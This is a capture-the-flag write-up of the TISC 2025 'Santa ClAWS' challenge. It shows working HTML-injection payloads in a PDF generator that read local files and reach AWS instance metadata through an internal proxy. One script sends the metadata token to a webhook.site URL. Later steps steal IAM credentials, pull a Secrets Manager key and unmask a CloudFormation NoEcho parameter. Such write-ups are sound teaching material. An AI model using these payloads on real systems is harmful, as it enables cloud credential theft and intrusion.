Santa ClAWS
This seemingly innocent site may be hiding something deeper — a covert cloud operations backend. Scratch beneath the surface. Unravel the yarn of lies. Every cat may hold a clue. http://santa-claws.chals.tisc25.ctf.sg
After completing Level 6, players are given the option to pick between a Web-oriented route and a Rev-oriented route for the next two levels. I picked the former, which started with this Cloud/Web challenge. Funnily enough, the last Cloud challenge I did was set by the same author and also in TISC, but 3 years ago. While I may not have improved much in my Cloud ability since then, LLMs thankfully have.
The site is a PDF generator. We can specify a name, a description, and an email, which will be injected into a PDF template and returned to us.
Arbitrary content injection is always suspicious, and trying a few payloads reveals that the template is susceptible to raw HTML injection. For example, if we supply the name <h2>dummyname</h2>, the name in the PDF is displayed in a larger font.
HTML injection via a PDF renderer is a classic CTF challenge (see: NahamCon CTF 2022, Hacker Ts). This grants us traditional SSRF capabilities. In fact, we can even obtain LFI using this HackTricks payload:
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write('<div style="width:100%;white-space:pre-wrap; word-break:break-all;">'+btoa(this.responseText)+'</div>')};
x.open("GET","file:///etc/passwd");x.send();
</script>
Use the CSS style to prevent longer file contents from running off the PDF.
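The file contents come back base64-encoded inside the PDF, so after copying the blob out we just decode it locally. A minimal sketch (leaked.b64 is a hypothetical file holding the pasted text):

# Decode the base64 blob copied out of the generated PDF
base64 -d leaked.b64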
But what file to read? Examining the site’s page source gives us the hint <!-- TODO: Verify the systemd service config for runtime ports (done) -->. Performing some enumeration, we find that the systemd config file /etc/systemd/system/santaclaws.service exists.
[Unit]
Description=Gunicorn service for Flask app
After=network.target

[Service]
User=ubuntu
Group=www-data
WorkingDirectory=/home/ubuntu/app
Environment="PATH=/home/ubuntu/app/venv/bin"
Environment="PROXY_PORT=45198"
ExecStart=/home/ubuntu/app/venv/bin/gunicorn --workers 3 --bind 127.0.0.1:8000 --timeout 120 app:app
Restart=always
RestartSec=5
MemoryMax=1G

[Install]
WantedBy=multi-user.target
Interesting, looks like there is a proxy running on port 45198.
Now that we know the working directory, we can use the LFI to leak the server’s source code (likely /home/ubuntu/app/app.py, given the WorkingDirectory and the app:app entry point). Here’s the first section of code:
config = pdfkit.configuration(wkhtmltopdf='/usr/bin/wkhtmltopdf')
app = Flask(__name__)
CORS(app, resources={r"/*": {"origins": "*"}},
     allow_headers=["X-aws-ec2-metadata-token-ttl-seconds"],
     methods=["GET","POST","PUT","OPTIONS"])

with open('static/certificate.png', 'rb') as img_file:
    encoded_img = base64.b64encode(img_file.read()).decode("utf-8")
    encoded_img = encoded_img.replace("\n","")
The interesting part is the CORS allowed header! It hints at a typical cloud SSRF attack to steal cloud credentials. From the challenge name “ClAWS”, we can assume that the server is running on AWS (confirmed via an IP lookup). AWS instances can query the Instance Metadata Service (IMDS), an internal endpoint at http://169.254.169.254/latest/meta-data/ that serves instance metadata, including the temporary credentials of any attached IAM role. Crucially, it is only reachable from within the instance itself, which is exactly the access the SSRF gives us.
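For reference, the normal IMDSv2 flow from inside an instance looks like the following; we will have to reproduce both requests through the SSRF instead:

# Standard IMDSv2 dance (run on the instance itself): fetch a session token,
# then use it to read metadata such as the attached IAM role's credentials
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"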
Trying to reach the IMDS endpoint directly from the injected HTML fails, however. Sending the request via the proxy works instead: we point the metadata request at the internal proxy, e.g. http://127.0.0.1:45198/latest/meta-data/iam. We first have to obtain an IMDSv2 token to perform IMDS operations, and the CORS setting conveniently allows exactly the header we need for that.
<script>
var readfile = new XMLHttpRequest();
var exfil = new XMLHttpRequest();
readfile.open("PUT", "http://127.0.0.1:45198/latest/api/token", true);
readfile.setRequestHeader("X-aws-ec2-metadata-token-ttl-seconds", "21600");
readfile.onload = function() {
  var url = "https://webhook.site/5f286926-c220-499c-817c-8322d56f7730?data=" + btoa(this.response);
  exfil.open("GET", url, true);
  exfil.send();
};
readfile.send();
</script>
Using that token, we can then obtain IAM credentials for the claws-ec2 role (via the standard IMDS path /latest/meta-data/iam/security-credentials/claws-ec2, again tunnelled through the proxy).
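Once the temporary AccessKeyId, SecretAccessKey, and Token have been exfiltrated, they can be plugged into the AWS CLI locally. A minimal sketch, with placeholder values:

# Hypothetical local setup using the leaked claws-ec2 temporary credentials
export AWS_ACCESS_KEY_ID='ASIA...'
export AWS_SECRET_ACCESS_KEY='<secret>'
export AWS_SESSION_TOKEN='<session token>'
export AWS_DEFAULT_REGION=ap-southeast-1

# Sanity check: confirm the CLI is now acting as the claws-ec2 role
aws sts get-caller-identity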
These credentials let us authenticate as that role and perform whatever actions it is authorized for. Performing further enumeration, we can also leak the instance’s user-data (served at /latest/user-data on IMDS), the custom startup script that the EC2 instance runs. This reveals the existence of an S3 bucket:
# Define variables
APP_DIR="/home/ubuntu/app"
ZIP_FILE="app.zip"
S3_BUCKET="s3://claws-web-setup-bucket"
VENV_DIR="$APP_DIR/venv"
Let’s check it out.
# aws s3 ls s3://claws-web-setup-bucket --region ap-southeast-1
2025-09-09 08:27:47 1179203 app.zip
2025-09-09 08:21:42 34 flag1.txt
root@gc:/host_owned/ctf/tisc25/lvl7# aws s3 cp s3://claws-web-setup-bucket/flag1.txt . --region ap-southeast-1
download: s3://claws-web-setup-bucket/flag1.txt to ./flag1.txt
root@gc:/host_owned/ctf/tisc25/lvl7# cat flag1.txt
TISC{iMPURrf3C7_sSRFic473_Si73_4nd
Great. But that’s only part 1 of the flag. We can continue enumerating what the current role is allowed to do using pacu. This reveals two things. Firstly, there is a secret API key in Secrets Manager.
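To locate the secret’s name in the first place, listing the secrets visible to the role is one option (a sketch; the enumeration route may differ from what the tooling surfaces):

# List the secrets the claws-ec2 role can see (names only)
aws secretsmanager list-secrets --region ap-southeast-1 --query 'SecretList[].Name'

Retrieving its value then gives us the internal API key: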
aws secretsmanager get-secret-value --secret-id internal_web_api_key-t7au98 --region ap-southeast-1
{
    "ARN": "arn:aws:secretsmanager:ap-southeast-1:533267020068:secret:internal_web_api_key-t7au98-2SPiPW",
    "Name": "internal_web_api_key-t7au98",
    "VersionId": "terraform-20250909082140200100000004",
    "SecretString": "{\"api_key\":\"54ul3yrF4p3mc7S4dhf0yy0AY5GQWd15\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1757406100.327
}
Secondly, there are 2 EC2 instances running. The first is the public web server that hosts the PDF generator. The second is a private internal server.
aws ec2 describe-instances --region ap-southeast-1
<...>
            "RootDeviceName": "/dev/sda1",
            "RootDeviceType": "ebs",
            "SecurityGroups": [
                {
                    "GroupId": "sg-0bb5643e275d678e5",
                    "GroupName": "internal-ec2-sg"
                }
            ],
            "SourceDestCheck": true,
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "claws-internal"
                }
            ],
<...>
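The private IP of the internal instance, which we need for the next SSRF hop, can be pulled straight from the same API; a sketch using a tag filter:

# Grab the claws-internal instance's private IP for use in the SSRF payloads
aws ec2 describe-instances --region ap-southeast-1 \
  --filters "Name=tag:Name,Values=claws-internal" \
  --query 'Reservations[].Instances[].PrivateIpAddress' --output text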
We will likely have to perform lateral movement to get the second part of the flag. While we can’t reach the internal server directly, we can use the SSRF to send requests to its private IP. This reveals a “CloudOps Internal Tool” site that exposes two endpoints: one generates a stack given an API key, and the other performs a health check on a supplied URL.
const statusEl = document.getElementById("stack_status");
const healthStatusEl = document.getElementById("health_status");
const urlInput = document.getElementById("url_input");

function get_stack() {
  fetch(`/api/generate-stack?api_key=${apiKey}`)
    .then(res => res.json())
    .then(data => {
      if (data.stackId) {
        statusEl.textContent = `Stack created: ${data.stackId}`;
      } else {
        statusEl.textContent = `Error: ${data.error || 'Unknown'}`;
        console.error(data);
      }
    })
    .catch(err => {
      statusEl.textContent = "Request failed";
      console.error(err);
    });
}

function check_url() {
  const url = urlInput.value;
  if (!url) {
    healthStatusEl.textContent = "Please enter a URL";
    return;
  }
  fetch(`/api/healthcheck?url=${encodeURIComponent(url)}`)
    .then(res => res.json())
    .then(data => {
      if (data.status === "up") {
        healthStatusEl.textContent = "Site is up";
      } else {
        healthStatusEl.textContent = `Site is down: ${data.error}`;
      }
    })
    .catch(err => {
      healthStatusEl.textContent = "Healthcheck failed";
      console.error(err);
    });
}
The JavaScript source for the internal site.
The generate-stack endpoint requires an API key, which brings to mind the secret we pulled from Secrets Manager earlier. Continuing to use the SSRF, we can call this internal API with that key and successfully create a stack. In the context of AWS, this stack likely refers to a CloudFormation stack. However, our current role doesn’t have the permissions to view it.
Instead, we have to use the healthcheck endpoint to perform a second SSRF, this time originating from the internal instance, and use it to grab credentials tied to the internal instance’s role. With this new role, we can successfully query and describe the stack.
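With the internal instance’s credentials exported (same environment-variable approach as before), describing the stack looks something like this, using the stack name returned by generate-stack:

# Describe the stack created via the internal tool, now acting as the internal role
aws cloudformation describe-stacks --stack-name pawxy-sandbox-616d8aee --region ap-southeast-1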
The output shows that the stack takes a parameter flagpt2, but its value is censored. Examining the stack template, we can see why:
aws cloudformation get-template --stack-name pawxy-sandbox-616d8aee --region ap-southeast-1
{
    "TemplateBody": "AWSTemplateFormatVersion: '2010-09-09'\nDescription: >\n Flag part 2\n\nParameters:\n flagpt2:\n Type: String\n NoEcho: true\nResources:\n AppDataStore:\n Type: AWS::S3::Bucket\n Properties:\n BucketName: !Sub app-data-sandbox-bucket\n\n ",
    "StagesAvailable": [
        "Original",
        "Processed"
    ]
}
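The JSON-escaped body is easier to read if we pull out just the template text; a small helper using the same stack name:

# Print the raw YAML template body instead of the JSON-escaped string
aws cloudformation get-template --stack-name pawxy-sandbox-616d8aee \
  --region ap-southeast-1 --query TemplateBody --output text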
The parameter has NoEcho set to true, which masks its value in API responses. Bypassing this is another common cloud challenge: simply create a new template file with NoEcho removed (here, we also add an Outputs entry that echoes the parameter back):
AWSTemplateFormatVersion: '2010-09-09'
Description: >
  Flag part 2

Parameters:
  flagpt2:
    Type: String
    # Removed NoEcho: true

Outputs:
  FlagValue:
    Description: 'The flag value'
    Value: !Ref flagpt2

Resources:
  AppDataStore:
    Type: AWS::S3::Bucket
    Properties:
      BucketName: !Sub 'app-data-sandbox-bucket-${AWS::StackId}'
We can then push this as a stack update with: aws cloudformation update-stack --stack-name pawxy-sandbox-616d8aee --region ap-southeast-1 --template-body file://template.yaml --capabilities CAPABILITY_IAM --disable-rollback --parameters ParameterKey=flagpt2,UsePreviousValue=true. Since flagpt2 is no longer marked NoEcho, its value is unmasked, revealing the second part of the flag.
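Once the update completes, reading the stack’s outputs (or its now-unmasked parameters) should expose the value; a sketch:

# Read the FlagValue output added by the updated template
aws cloudformation describe-stacks --stack-name pawxy-sandbox-616d8aee \
  --region ap-southeast-1 --query 'Stacks[0].Outputs'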
Flag: TISC{iMPURrf3C7_sSRFic473_Si73_4nd_c47_4S7r0PHiC_fL4w5}